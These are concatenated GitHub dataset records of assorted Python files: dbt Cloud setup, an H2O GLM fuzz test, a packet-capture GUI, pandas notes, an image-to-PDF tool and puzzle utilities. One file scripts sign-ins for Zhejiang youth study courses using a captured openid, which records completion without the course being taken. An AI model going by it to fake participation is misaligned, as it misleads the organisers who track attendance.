cv2.imshow(\"Frame\", flip_img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nvideoCapture.release()\ncv2.destroyAllWindows()\n","repo_name":"wilgnerl/circle-detector","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17181739060","text":"import numpy as np\n\nfrom .model_predict import ImageReader, predict_pose\n\n\ndef map_norm_item(item_list):\n ret = []\n for item in item_list:\n ret.append({\"value\": item, \"norm\": np.linalg.norm(item)})\n return ret\n\n\ndef cos_sim(a, b):\n a_nalue_norm = map_norm_item(a)\n b_nalue_norm = map_norm_item(b)\n max_sim = 0\n\n for a in a_nalue_norm:\n for b in b_nalue_norm:\n sim = np.divide(\n np.dot(a[\"value\"], b[\"value\"]), np.multiply(a[\"norm\"], b[\"norm\"])\n )\n if sim > max_sim:\n max_sim = sim\n return max_sim\n\n\ndef get_angle(image: np.ndarray, angle_idx=0, isfile=False):\n frame_provider = ImageReader([image], isfile=isfile)\n angle = predict_pose(frame_provider).angles[angle_idx]\n return angle\n","repo_name":"Gachon-LDC/Back-End","sub_path":"App/services/model_compare.py","file_name":"model_compare.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32975939495","text":"# Python skeleton example of how to create a set of Credential and Environment, then link them in dbt Cloud\n# Credentials have an \"id\" that is referenced by the Environment metadata\n\nimport requests\nimport json\nfrom requests import api\nfrom requests.api import head\nimport os\nimport re\nimport enum\n\n# set api token as environment variable or hardcode\n# this can be generate following these instructions https://docs.getdbt.com/docs/dbt-cloud/dbt-cloud-api/service-tokens\napi_token = os.getenv('DBT_CLOUD_API_KEY')\n# api_token = ''\n\n# set account_id & relevant job_id\n# this can be found in the url for the job in dbt Cloud\n# https://cloud.getdbt.com/#/accounts//projects/\naccount_id = 13858\nproject_id = 36215\nbase_url = 'https://cloud.getdbt.com'\n\n# snowflake creds\nusername = 'my_user'\npassword = 'my_password'\n\n# environment details\nenvironment_name = 'My Environment 3.0'\ndbt_version = '1.0.0'\ncreds_id = 0\n\ncredentials_create_body = f\"\"\"\n{{\n \"id\": null,\n \"account_id\": {account_id},\n \"project_id\": {project_id},\n \"state\": 1,\n \"threads\": 1,\n \"target_name\": \"default\",\n \"type\": \"snowflake\",\n \"schema\": \"dbt_username\",\n \"auth_type\": \"password\",\n \"user\": \"{username}\",\n \"password\": \"{password}\"\n}}\n\"\"\"\n\n# set headers\nheaders = {\n 'Authorization': f\"Token {api_token}\",\n 'Content-Type': 'application/json'\n}\n\ncreds_url = f\"{base_url}/api/v3/accounts/{account_id}/projects/{project_id}/credentials/\"\n\n# create credentials\ntry:\n result = requests.post(creds_url, headers=headers, data=json.dumps(json.loads(credentials_create_body)))\n result = json.loads(result.content)\nexcept Exception as e:\n raise SystemExit(e)\n\nprint(json.dumps(result, indent=4, sort_keys=True))\n\n\n# get credentials id\ncreds_id = result['data']['id']\n\nenvironment_create_body = f\"\"\"\n{{\n \"id\": null,\n \"account_id\": {account_id},\n \"project_id\": {project_id},\n \"name\": \"{environment_name}\",\n \"credentials_id\": {creds_id},\n \"dbt_version\": \"{dbt_version}\",\n \"type\": \"deployment\"\n}}\n\"\"\"\n\nenvironment_url = f\"{base_url}/api/v3/accounts/{account_id}/projects/{project_id}/environments/\"\n\n# create environment with associated credentials\ntry:\n result = requests.post(environment_url, headers=headers, data=json.dumps(json.loads(environment_create_body)))\n result = json.loads(result.content)\nexcept Exception as e:\n raise SystemExit(e)\n\nprint(json.dumps(result, indent=4, sort_keys=True))","repo_name":"lbk-fishtown/examples","sub_path":"set_credentials.py","file_name":"set_credentials.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13349088934","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators.glm import H2OGeneralizedLinearEstimator\n\nimport random\n\ndef random_attack():\n\n def cointoss():\n return random.randint(0, 1)\n\n def attack(family, train, valid, x, y):\n kwargs = {}\n kwargs[\"family\"] = family\n gaussian_links = [\"inverse\", \"log\", \"identity\"]\n binomial_links = [\"logit\"]\n poisson_links = [\"log\", \"identity\"]\n gamma_links = [\"inverse\", \"log\", \"identity\"]\n\n # randomly select parameters and their corresponding values\n if cointoss(): kwargs[\"max_iterations\"] = random.randint(1, 50)\n if random.random() > 0.8: kwargs[\"beta_epsilon\"] = random.random()\n if cointoss(): kwargs[\"solver\"] = [\"AUTO\", \"IRLSM\", \"L_BFGS\", \"COORDINATE_DESCENT_NAIVE\",\n \"COORDINATE_DESCENT\"][cointoss()]\n if cointoss(): kwargs[\"standardize\"] = [True, False][cointoss()]\n if cointoss():\n if family == \"gaussian\": kwargs[\"link\"] = gaussian_links[random.randint(0, 2)]\n elif family == \"binomial\": kwargs[\"link\"] = binomial_links[0]\n elif family == \"poisson\": kwargs[\"link\"] = poisson_links[cointoss()]\n elif family == \"gamma\": kwargs[\"link\"] = gamma_links[random.randint(0, 2)]\n if cointoss(): kwargs[\"alpha\"] = [random.random()]\n if family == \"binomial\":\n if cointoss(): kwargs[\"prior\"] = random.random()\n if cointoss(): kwargs[\"lambda_search\"] = [True, False][cointoss()]\n if \"lambda_search\" in list(kwargs.keys()):\n if cointoss(): kwargs[\"nlambdas\"] = random.randint(2, 10)\n do_validation = [True, False][cointoss()]\n # beta constraints\n if cointoss():\n bc = []\n for n in x:\n if train[n].isnumeric()[0]:\n name = train.names[n]\n lower_bound = random.uniform(-1, 1)\n upper_bound = lower_bound + random.random()\n bc.append([name, lower_bound, upper_bound])\n if len(bc) > 0:\n beta_constraints = h2o.H2OFrame(bc)\n beta_constraints.set_names([\"names\", \"lower_bounds\", \"upper_bounds\"])\n kwargs[\"beta_constraints\"] = beta_constraints\n\n # display the parameters and their corresponding values\n print(\"-----------------------\")\n print(\"x: {0}\".format(x))\n print(\"y: {0}\".format(y))\n print(\"validation: {0}\".format(do_validation))\n for k, v in kwargs.items():\n if k == \"beta_constraints\":\n print(k + \": \")\n beta_constraints.show()\n else:\n print(k + \": {0}\".format(v))\n if do_validation:\n # h2o.glm(x=train[x], y=train[y], validation_x=valid[x], validation_y=valid[y], **kwargs)\n H2OGeneralizedLinearEstimator(**kwargs).train(x=x, y=y, training_frame=train, validation_frame=valid)\n else:\n # h2o.glm(x=train[x], y=train[y], **kwargs)\n H2OGeneralizedLinearEstimator(**kwargs).train(x=x, y=y, training_frame=train)\n print(\"-----------------------\")\n\n print(\"Import and data munging...\")\n seed = random.randint(1, 10000)\n print(\"SEED: {0}\".format(seed))\n pros = h2o.upload_file(pyunit_utils.locate(\"smalldata/prostate/prostate.csv.zip\"))\n pros[1] = pros[1].asfactor()\n r = pros[0].runif(seed=seed) # a column of length pros.nrow with values between 0 and 1\n # ~80/20 train/validation split\n pros_train = pros[r > .2]\n pros_valid = pros[r <= .2]\n\n cars = h2o.upload_file(pyunit_utils.locate(\"smalldata/junit/cars.csv\"))\n r = cars[0].runif(seed=seed)\n cars_train = cars[r > .2]\n cars_valid = cars[r <= .2]\n\n print()\n print(\"======================================================================\")\n print(\"============================== Binomial ==============================\")\n print(\"======================================================================\")\n for i in range(10):\n attack(\"binomial\", pros_train, pros_valid, random.sample([2, 3, 4, 5, 6, 7, 8], random.randint(1, 7)), 1)\n\n print()\n print(\"======================================================================\")\n print(\"============================== Gaussian ==============================\")\n print(\"======================================================================\")\n for i in range(10):\n attack(\"gaussian\", cars_train, cars_valid, random.sample([2, 3, 4, 5, 6, 7], random.randint(1, 6)), 1)\n\n print()\n print(\"======================================================================\")\n print(\"============================== Poisson ==============================\")\n print(\"======================================================================\")\n for i in range(10):\n attack(\"poisson\", cars_train, cars_valid, random.sample([1, 3, 4, 5, 6, 7], random.randint(1, 6)), 2)\n\n print()\n print(\"======================================================================\")\n print(\"============================== Gamma ==============================\")\n print(\"======================================================================\")\n for i in range(10):\n attack(\"gamma\", pros_train, pros_valid, random.sample([1, 2, 3, 5, 6, 7, 8], random.randint(1, 7)), 4)\n\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(random_attack)\nelse:\n random_attack()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_algos/glm/pyunit_random_attack_medium.py","file_name":"pyunit_random_attack_medium.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"32431497014","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 14 00:08:43 2020\n'''\npython 3.7\ntensorflow 2.1\npillow(PIL) 4.3.0\n\n代码参考:https://github.com/geektutu/tensorflow-tutorial-samples\n\n\n\"\"\"\n\nfrom PIL import Image\nimport numpy as np\n\nfrom mnist_cnn import CNN\n\nclass Predict(object):\n def __init__(self):\n# latest = tf.train.latest_checkpoint('./ckpt')\n self.network = CNN()\n # 恢复网络权重\n #self.network.model.load_weights(latest)\n self.network.model.load_weights('./ckpt/cp-0004.ckpt')\n\n def predict(self, image_path):\n # 以黑白方式读取图片\n img = Image.open(image_path).convert('L')\n flatten_img = np.reshape(img, (28, 28, 1))\n x = np.array([1 - flatten_img ])\n# print(x)\n\n # API refer: https://keras.io/models/model/\n y = self.network.model.predict(x)\n\n # 因为x只传入了一张图片,取y[0]即可\n # np.argmax()取得最大值的下标,即代表的数字\n print(image_path)\n print(y[0],' -> 预测数字为:', np.argmax(y[0]))\n\n\nif __name__ == \"__main__\":\n app = Predict()\n app.predict('./test_images/0_57.png')\n app.predict('./test_images/1_32.png')\n app.predict('./test_images/3_59.png')\n","repo_name":"yhily/deep-learning-resource","sub_path":"srcs/chap07/7-5/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"43144195990","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\n\nfrom Threads.Cap_Thread import capturethread\nfrom Data import saveQueue\nfrom Tools import scapy2ordereddict\n\n\nclass capture(QWidget):\n filterApplied = pyqtSignal()\n def __init__(self):\n super().__init__()\n self.initUI()\n self.packet_list = []\n\n def initUI(self):\n mainLayout = QVBoxLayout(self)\n\n filter_layout = QHBoxLayout()\n filter_label = QLabel('Filter')\n self.filter_lineEdit = QLineEdit()\n filter_apply_btn = QPushButton('Apply')\n filter_layout.addWidget(filter_label)\n filter_layout.addWidget(self.filter_lineEdit)\n filter_layout.addWidget(filter_apply_btn)\n mainLayout.addLayout(filter_layout)\n self.filter = ''\n\n splitterMain = QSplitter(Qt.Vertical, self)\n self.QuickView = QTableWidget(splitterMain)\n self.QuickView.setColumnCount(6)\n self.QuickView.setHorizontalHeaderLabels(['번호', '시간', 'Source', 'Destination', 'Protocol', '크기'])\n self.QuickView.setColumnWidth(0, 60)\n self.QuickView.verticalHeader().setVisible(False)\n #데이터 길이에 따라 테이블 길이 변경\n self.QuickView.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)\n self.QuickView.setShowGrid(False)\n self.QuickView.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.QuickView.setSelectionMode(QTableWidget.ExtendedSelection)\n # 테이블 수정 불가능하게 설정\n self.QuickView.setEditTriggers(QAbstractItemView.NoEditTriggers)\n # 테이블 정렬기능\n self.QuickView.setSortingEnabled(True)\n\n self.DetailView = QTreeWidget(splitterMain)\n self.DetailView.setColumnCount(2)\n self.DetailView.setHeaderLabels(['Item', 'Detail'])\n mainLayout.addWidget(splitterMain)\n\n bottomLayout = QHBoxLayout()\n self.start_btn = QPushButton('START')\n self.stop_btn = QPushButton('STOP')\n self.restart_btn = QPushButton('Restart')\n self.clear_btn = QPushButton('CLEAR')\n bottomLayout.addWidget(self.start_btn)\n bottomLayout.addWidget(self.stop_btn)\n bottomLayout.addWidget(self.restart_btn)\n bottomLayout.addWidget(self.clear_btn)\n bottomLayout.addStretch()\n self.stop_btn.setEnabled(False)\n self.restart_btn.setEnabled(False)\n mainLayout.addLayout(bottomLayout)\n\n self.start_btn.clicked.connect(self.start_sniff)\n \n self.stop_btn.clicked.connect(self.stop_sniff)\n self.QuickView.currentItemChanged.connect(self.show_current_detail)\n self.restart_btn.clicked.connect(self.restart_sniff)\n self.clear_btn.clicked.connect(self.clear_widget)\n self.count = 0\n\n def start_sniff(self):\n self.cap_thread = capturethread()\n self.cap_thread.newPkt.connect(self.init_display)\n self.cap_thread.start()\n\n self.start_btn.setEnabled(False)\n self.stop_btn.setEnabled(True)\n self.restart_btn.setEnabled(False)\n\n def init_display(self, item_list,pkt):\n self.packet_list.append(pkt)\n self.QuickView.insertRow(self.QuickView.rowCount())\n\n for i in range(6):\n self.QuickView.setItem(self.QuickView.rowCount()-1, i, item_list[i])\n\n def buildTree(self):\n self.DetailView.clear()\n\n for title in self.packetDict.keys():\n tree_item = QTreeWidgetItem(self.DetailView)\n tree_item.setText(0, title)\n tree_item.setExpanded(True)\n detail_dic = self.packetDict[title]\n\n for i in detail_dic.keys():\n leaf = QTreeWidgetItem(tree_item, [i, str(detail_dic[i])])\n leaf.setToolTip(1,str(detail_dic[i]))\n tree_item.addChild(leaf)\n\n self.DetailView.addTopLevelItem(tree_item)\n\n def stop_sniff(self):\n self.cap_thread.set_stopper(True)\n self.start_btn.setEnabled(True)\n self.restart_btn.setEnabled(True)\n self.stop_btn.setEnabled(False)\n\n def restart_sniff(self):\n self.pkt_queue = saveQueue.get_pkt()\n self.label_queue = saveQueue.get_label()\n with self.label_queue.mutex:\n self.label_queue.queue.clear()\n with self.pkt_queue.mutex:\n self.pkt_queue.queue.clear()\n\n self.packet_list.clear()\n self.QuickView.clearContents()\n self.DetailView.clear()\n self.start_sniff()\n\n def show_current_detail(self):\n if self.packet_list:\n pkt = self.packet_list[self.QuickView.currentRow()]\n self.packetDict = scapy2ordereddict.to_dict(pkt)\n self.buildTree()\n\n def clear_widget(self):\n self.pkt_queue = saveQueue.get_pkt()\n self.label_queue = saveQueue.get_label()\n with self.label_queue.mutex:\n self.label_queue.queue.clear()\n with self.pkt_queue.mutex:\n self.pkt_queue.queue.clear()\n\n self.packet_list.clear()\n self.QuickView.clearContents()\n self.DetailView.clear()\n\nclass FakeOut:\n def __init__(self):\n self.str = ''\n\n def write(self, s):\n self.str += s\n\n def show(self):\n print(self.str)","repo_name":"danflanf/Computer_network","sub_path":"packet_sniff_program4/Widgets/Capture_Packet.py","file_name":"Capture_Packet.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40954003498","text":"\"\"\"\n\n- We can add dictionaries and lists to DataFrame\n- If need help can type dir(df1)\n- df1.<> is a DataFrame which contains almost same methods than \"pandas.DataFrame\"\n\n\"\"\"\nimport pandas\n\ndata_df1 = []\ndata_df1.append([\"COD01\", \"John\", 26, \"\"])\ndata_df1.append([\"COD02\", \"Jane\", 28, \"\"])\ndata_df1.append([\"COD03\", \"Paul\", 45, \"\"])\ndata_df1.append([\"COD04\", \"Nana\", 23, \"\"])\ndata_df1.append([\"COD05\", \"Jeff\", 35, \"\"])\ndata_df1.append([\"COD06\", \"Alan\", 52, \"\"])\n\ndf1 = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\n\n\"\"\"\n\nIt is possible to define if conditions to generate column values\n\n\"\"\"\ndf1.loc[df1.Age >= 30, \"Category\"] = \"Mature\"\ndf1.loc[df1.Age < 30, \"Category\"] = \"Young\"\ndf1.loc[df1.Age >= 50, \"Category\"] = \"Old\"\n\n\"\"\"\nSe column index to be da column 'ID'\n\"\"\"\ndf1 = df1.set_index(\"ID\")\n\n\"\"\"\n\nI can also create ranges for unique indexes.\nIn this case, from ID COD02 to COD04. \nBringing only from field 'Age' to 'Category'\n\n\"\"\"\ndf1 = df1.loc[\"COD02\":\"COD04\",\"Age\":\"Category\"]\n\n\"\"\"\nAnd restrict for attributes. In this case, where Age < 45\n\"\"\"\ndf1 = df1.loc[df1.Age < 45]\n\ndata_df2 = []\ndata_df2.append({\"Profession\": \"Programmer\", \"Salary\": 50000})\ndata_df2.append({\"Profession\": \"Engineer\", \"Salary\": 70000})\ndata_df2.append({\"Profession\": \"Lawyer\", \"Salary\": 65000})\ndata_df2.append({\"Profession\": \"Carpenter\", \"Salary\": 40000})\ndata_df2.append({\"Profession\": \"Waitress\", \"Salary\": 35000})\n\ndf2 = pandas.DataFrame(data_df2, columns=[\"Profession\", \"Salary\"])\n\n\"\"\"\nIt is possible to filter results. I.e: Get salaries > 40000\n\"\"\"\ndf2 = df2[df2.Salary > 40000]\n\n\"\"\"\nIt is also possible to get objects by specific position index and \n\"\"\"\ndf1_index = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\ndf1_index = df1_index.iloc[3, 1:3]\nprint(df1_index)\n\n\"\"\"\n\nAnd get values from specific index positions and fields\n\n\"\"\"\ndf1_index_value = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\ndf1_index_value = df1_index_value.loc[3, \"Name\"]\nprint(df1_index_value)\n\nprint(df1)\nprint(\"\\nMean age is %2.2f\" % df1.Age.mean())\nprint(\"Max age is %2.2f\" % df1.Age.max())\nprint(\"Min age is %2.2f\" % df1.Age.min())\nprint(df2)\nprint(\"\\nMean salary is $%2.2f\" % df2.Salary.mean())\nprint(\"Max salary is $%2.2f\" % df2.Salary.max())\nprint(\"Min salary is $%2.2f\" % df2.Salary.min())\n\n\"\"\"\n\nIt is possible to drop columns by name\n\n\"\"\"\ndf1_2 = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\ndf1_2.drop(\"Category\",1)\n\n\"\"\"\n\nIt is possible to drop rows by index\n\n\"\"\"\ndf1_3 = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\ndf1_3 = df1_3.set_index(\"ID\")\ndf1_3.drop(\"COD01\",0)\n\n\"\"\"\n\nIt is possible to drop rows by index positions ranges\n\n\"\"\"\ndf1_4 = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\ndf1_4 = df1_4.set_index(\"ID\")\ndf1_4.drop(df1_4.index[0:3],0)\n\n\"\"\"\n\nIt is possible to drop columns by index positions ranges\n\n\"\"\"\ndf1_5 = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\ndf1_5.drop(df1_5.columns[2:4],1)\n\n\"\"\"\nIt is possible to load data in many formats\n\"\"\"\ndf3 = pandas.read_json(\"supermarkets.json\")\ndf4 = pandas.read_csv(\"supermarkets.csv\")\ndf5 = pandas.read_excel(\"supermarkets.xlsx\", sheet_name=0)\ndf6 = pandas.read_csv(\"supermarkets-commas.txt\")\ndf7 = pandas.read_csv(\"supermarkets-semi-colons.txt\", sep=\";\")\n\n\"\"\"\n\nAdd new column 'Continent' for the DataFrame with default value 'North America'\n\n\"\"\"\ndf5_total_columns = df5.shape[0]\ndf5[\"Continent\"] = df5_total_columns*[\"North America\"]\n\n\"\"\"\n\nUpdate column value for each row\n\n\"\"\"\ndf5[\"Continent\"] = df5[\"Country\"] + \", \" + df5[\"Continent\"]\n\n\"\"\"\n\nAdd a new row for DataFrame\n\n\"\"\"\n\"\"\"\nAdd a new row for DataFrame\n\"\"\"\nnew_id = 7\ndf5 = df5.set_index(\"ID\")\ndf5_t = df5.T\ndf5_t[new_id] = [\"Center\", \"Florianopolis\", \"Santa Catarian\", \"Brazil\", \"Bistek\", 700]\ndf5 = df5_t.T","repo_name":"gabrielfs7/python-tests","sub_path":"data_analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43199244210","text":"from aiogram import Dispatcher, Bot\nfrom deta import Deta\n\nfrom example_bot.bot.handlers.form import form_router\n\n\ndef create_dispatcher(deta: Deta) -> Dispatcher:\n storage = DetaStorage(deta_base=deta.AsyncBase(\"fsm\"))\n dispatcher = Dispatcher(storage=storage)\n\n for router in [\n form_router,\n echo_router,\n ]:\n dispatcher.include_router(router)\n\n return dispatcher\n\n\ndef create_bot(token: str) -> Bot:\n return Bot(token=token, parse_mode=\"HTML\")\n","repo_name":"danilminer234/openai1","sub_path":"example_bot/bot/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31231019891","text":"import time\nfrom typing import Any\nimport requests\n\n\nclass ZheJiang():\n\n \"\"\"A Class for the completion of Zhejiang Youth University Study\"\"\"\n\n def __init__(self, nid, cardNo, openid, SendKey: str = None):\n \"\"\"\n description: init the class\n :param nid: 团组织编号, 形如N003************\n :param cardNo: 打卡昵称, 可能为学号, 也可能为姓名\n :param openid: 微信openid\n :param SendKey: Server酱的SendKey\n\n all params are required except SendKey, all params are need to capture from the network\n \"\"\"\n self.nid = nid\n self.cardNo = cardNo\n self.openid = openid\n self.SendKey = SendKey\n self.session = requests.session()\n self.access_token = self.getAccessToken()\n time.sleep(5)\n self.current_course = self.getCurrentCourse()\n time.sleep(5)\n self.result = None\n self.msg = None\n\n\n def __call__(self, *args: Any, **kwds: Any) -> Any:\n \"\"\"\n description: call the class\n :param args: args\n :param kwds: kwds\n :return: True if success, False if failed\n \"\"\"\n self.sign()\n \n\n def getAccessToken(self) -> str:\n \"\"\"\n description: get the access_token\n :return: access_token\n \"\"\"\n time_stamp = str(int(time.time())) # 获取时间戳\n url = \"https://qczj.h5yunban.com/qczj-youth-learning/cgi-bin/login/we-chat/callback?callback=https%3A%2F%2Fqczj\" \\\n \".h5yunban.com%2Fqczj-youth-learning%2Findex.php&scope=snsapi_userinfo&appid=wx56b888a1409a2920&openid=\" + \\\n self.openid + \"&nickname=ZhangSan&headimg=&time=\" + time_stamp + \"&source=common&sign=&t=\" + time_stamp\n \n res = self.session.get(url)\n access_token = res.text[45:81]\n print(\"获取到AccessToken:\", access_token)\n return access_token\n \n \n def getCurrentCourse(self):\n \"\"\"\n description: get the current course\n :return: current course\n \"\"\"\n url = \"https://qczj.h5yunban.com/qczj-youth-learning/cgi-bin/common-api/course/current?accessToken=\" + self.access_token\n res = self.session.get(url)\n if (res.status_code == 200): # 验证正常\n print(\"获取到最新课程代号:\", res.json()[\"result\"][\"id\"])\n return res.json()[\"result\"][\"id\"]\n else:\n print(\"获取最新课程失败!\")\n print(res.text)\n return False\n \n\n def sign(self):\n \"\"\"\n description: sign the current course\n :return: True if success, False if failed\n \"\"\"\n data = {\n \"course\": self.current_course,\n \"subOrg\": None,\n \"nid\": self.nid,\n \"cardNo\": self.cardNo\n }\n url = \"https://qczj.h5yunban.com/qczj-youth-learning/cgi-bin/user-api/course/join?accessToken=\" + self.access_token\n res = self.session.post(url, json=data)\n status = int(res.json()[\"status\"])\n self.msg = res.json()[\"message\"]\n print(res.text)\n if (res.status_code == 200 and status == 200):\n self.result = True\n else:\n self.result = False\n \n \n","repo_name":"IamK77/Youth_Study","sub_path":"youth_study_py/zhejiang.py","file_name":"zhejiang.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16149976171","text":"import cv2\nimport glob\nimport os\nfrom tqdm import tqdm\nimport natsort\nfrom PIL import Image\nimport img2pdf\n\ninput_dir = 'Images'\nos.mkdir('Cropped')\n\ni = 0\n\n#orginal shape 1366x768\nimages = []\nprint(\"Sortowanie...\")\nfor img in tqdm(glob.glob(input_dir + \"/*.png\")):\n images.append(img)\n\nimages_sorted = natsort.natsorted(images,reverse=False)\n\n\nprint(\"Obcinanie...\")\n\nfor img in tqdm(images_sorted):\n image = cv2.imread(img)\n imgCropped = image[0:800, 430:910]\n cv2.imwrite(\"Cropped/image%0i.png\" %i, imgCropped)\n i +=1\n #cv2.imshow('image',imgCropped)\n \n\n cv2.waitKey(30)\ncv2.destroyAllWindows()\n\ndef generate_pdf():\n t = os.listdir('.')\n\n t = natsort.natsorted(t,reverse=False)\n\n with open(\"book.pdf\", \"wb\") as f:\n f.write(img2pdf.convert([i for i in tqdm(t) if i.endswith(\".png\")]))\n\nos.chdir('Cropped')\ngenerate_pdf()\nprint(\"Utworzono PDF\")\n\n","repo_name":"arczi0/Cropp-make-PDF","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23451881641","text":"file = 'A-large.in.txt'\n\ndef parameters(textfile):\n file = open(textfile, 'r')\n curr_line = file.readline()\n curr_line = file.readline()\n wanted_list = []\n \n while curr_line != '':\n most_shy, dist = curr_line.split(' ')\n \n wanted_list = wanted_list + [[most_shy, str(dist)[:-1]]]\n\n curr_line = file.readline()\n \n\n return wanted_list\n\n##print(parameters(file))\n\ndef get_most_shy(lst):\n return lst[0]\n\ndef get_dist(lst):\n return lst[1]\n\ndef number(lst):\n output = open('GCJ Ovation Answer.txt', 'w')\n\n for index, element in enumerate(lst):\n extra = 0\n total_stand = 0\n dist = get_dist(element)\n \n for s in range(len(dist)):\n if total_stand >= s:\n total_stand += int(dist[s])\n \n else:\n extra += (s - total_stand)\n total_stand += int(dist[s]) + (s - total_stand)\n\n \n\n output.write((\"Case #%d: %d\" % (index + 1,extra) +'\\n'))\n\n \nnumber(parameters(file))\n\n\n \n\n\n\n\n \n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/2382.py","file_name":"2382.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34423495876","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 03 23:50:56 2014\n\n@author: aaditya prakash\n\"\"\"\nfrom __future__ import division\nimport re\nimport numpy as np\nfrom itertools import permutations \nimport math\nfrom functools import reduce\nfrom fractions import Fraction\nfrom collections import defaultdict\nfrom itertools import count\nfrom operator import mul\n\ndef is_square(i):\n x = i // 2\n seen = set([x])\n while x * x != i:\n x = (x + (i // x) ) // 2\n if x in seen: return False\n seen.add(x)\n return True\n\ndef Fibonacci():\n \"\"\" generator function to generate infinite values of fib series \"\"\"\n a,b = 0,1\n yield a\n yield b\n while True:\n a, b = b, a + b\n yield b\n\n\ndef generate_cube(start):\n \"\"\" yields cubes starting from start^3\"\"\"\n while True:\n yield start**3\n start += 1\n\ndef isPrime(n):\n \"\"\" returns true if given number is prime, false otherwise \"\"\"\n if(n < 2): return False \n for i in range(2,int(n**0.5)+1):\n if n%i==0:\n return False\n\n return True\n\ndef isPrimeFast(n):\n \"\"\"\"precondition n is a nonnegative integer postcondition: return True if n is prime and False otherwise.\"\"\"\n if n < 2:\n return False;\n if n % 2 == 0:\n # return False\n return n == 2\n k = 3\n while k*k <= n:\n if n % k == 0:\n return False\n k += 2\n return True\n\ndef Prime(number=2):\n \"\"\" generator function to generate infinite values of prime numbers starting from 'number' \"\"\"\n while True:\n if isPrimeFast(number):\n yield number\n number += 1\n\ndef PrimeReverse(number):\n \"\"\" generator function to generate infinite values of prime numbers starting from 'number' but going lower \"\"\"\n while True:\n if number < 2:\n yield 2\n elif isPrimeFast(number):\n yield number\n number -= 1\n\ndef PrimeList(number):\n \"\"\" return a list of all the prime number less then given 'number ' \"\"\"\n iterPrime = Prime(2)\n primeList = []\n nextPrime = iterPrime.next()\n while nextPrime < number:\n primeList.append(nextPrime)\n nextPrime = iterPrime.next()\n return primeList\n\ndef PrimeRange(start, end):\n \"\"\" return a list of all the prime number in the range start to end (not inclusive)\"\"\"\n iterPrime = Prime(start)\n primeList = []\n nextPrime = iterPrime.next()\n while nextPrime < end:\n primeList.append(nextPrime)\n nextPrime = iterPrime.next()\n return primeList\n\ndef NthPrime(number):\n \"\"\" returns the nth prime number, where 'n' = number. 2 is first prime \"\"\"\n iterPrime = Prime(2)\n for i in range(number):\n nextPrime = iterPrime.next()\n return nextPrime\n \nprimes_cache, prime_jumps = [], defaultdict(list)\ndef primes():\n prime = 1\n for i in count():\n if i < len(primes_cache): prime = primes_cache[i]\n else:\n prime += 1\n while prime in prime_jumps:\n for skip in prime_jumps[prime]:\n prime_jumps[prime + skip] += [skip]\n del prime_jumps[prime]\n prime += 1\n prime_jumps[prime + prime] += [prime]\n primes_cache.append(prime)\n yield prime\n\ndef factorize(n):\n for prime in primes():\n if prime > n: return\n exponent = 0\n while n % prime == 0:\n exponent, n = exponent + 1, n / prime\n if exponent != 0:\n yield prime, exponent\n\n\ndef totient(n):\n return reduce(mul, ((p-1) * p ** (exp-1) for p, exp in factorize(n)), 1)\n\ndef IsPalindrome(s):\n \"\"\" Checks if the given string 's' is palindrome \"\"\"\n return s==s[::-1]\n \ndef IsPalindromeInt(n):\n \"\"\" ABANDONED, as it turns out that covnerting to string and checking palindrome is faster than using modulo. checks if the given integer is palindrome, goes not use string conversion \"\"\"\n return IsPalindrome(str(n))\n \n\ndef Palindrome(number):\n \"\"\" generator function to generate infinite palindrome larger than given number \"\"\"\n while True:\n if IsPalindrome(number):\n yield number\n number += 1\n\ndef PalindromeReverse(number):\n \"\"\" generator function to generate infinite palindrome smaller than given number in reverse \"\"\"\n while 